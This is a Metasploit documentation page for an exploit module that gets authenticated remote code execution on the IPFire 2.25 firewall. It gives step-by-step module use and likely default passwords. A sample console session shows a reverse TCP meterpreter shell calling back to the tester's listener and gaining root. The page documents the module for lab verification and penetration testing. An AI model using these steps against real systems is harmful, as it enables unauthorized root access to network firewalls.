adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
8e16d4a1c7b5dcd4fcaaaf13fc12e3d24ed0a174
metasploit-gs/documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md
T
MucahitSaratar 8e16d4a1c7 ipfire 2.25 core 156 remote code execution 
Signed-off-by: MucahitSaratar <trregen222@gmail.com>
2021-06-10 09:34:13 -05:00

1.7 KiB
Raw Blame History

Vulnerable Application

Official Source: ipfire Archived Copy: github

Verification Steps

  1. Install the firewall
  2. Start msfconsole
  3. Do: use exploit/linux/http/ipfire_pakfire_exec
  4. Do: set password 012345 or whatever it was set to at install
  5. Do: set rhost 192.168.1.100
  6. Do: set lhost 192.168.1.106
  7. Do: exploit
  8. You should get a shell.

Options

PASSWORD

Password is set at install. May be blank, 'admin', or 'ipfire'.

Scenarios

  msf6 > use exploit/linux/http/ipfire_pakfire_exec
  [*] No payload configured, defaulting to python/meterpreter/reverse_tcp
  msf6 exploit(linux/http/ipfire_pakfire_exec) > set password 012345
  password => 012345
  msf6 exploit(linux/http/ipfire_pakfire_exec) > set rhost 192.168.1.100
  rhost => 192.168.1.100
  msf6 exploit(linux/http/ipfire_pakfire_exec) > set lhost 192.168.1.106
  lhost => 192.168.1.106
  msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

  [*] Started reverse TCP handler on 192.168.1.106:4444 
  [*] Sending stage (39392 bytes) to 192.168.1.100
  [*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.100:55330) at 2021-05-23 19:28:38 +0300

  meterpreter > shell
  Process 2905 created.
  Channel 1 created.
  sh: cannot set terminal process group (2900): Inappropriate ioctl for device
  sh: no job control in this shell
  sh-5.0# id
  uid=0(root) gid=0(root) groups=0(root)
  sh-5.0# hostname
  ipfire.localdomain
  sh-5.0#
Reference in New Issue View Git Blame Copy Permalink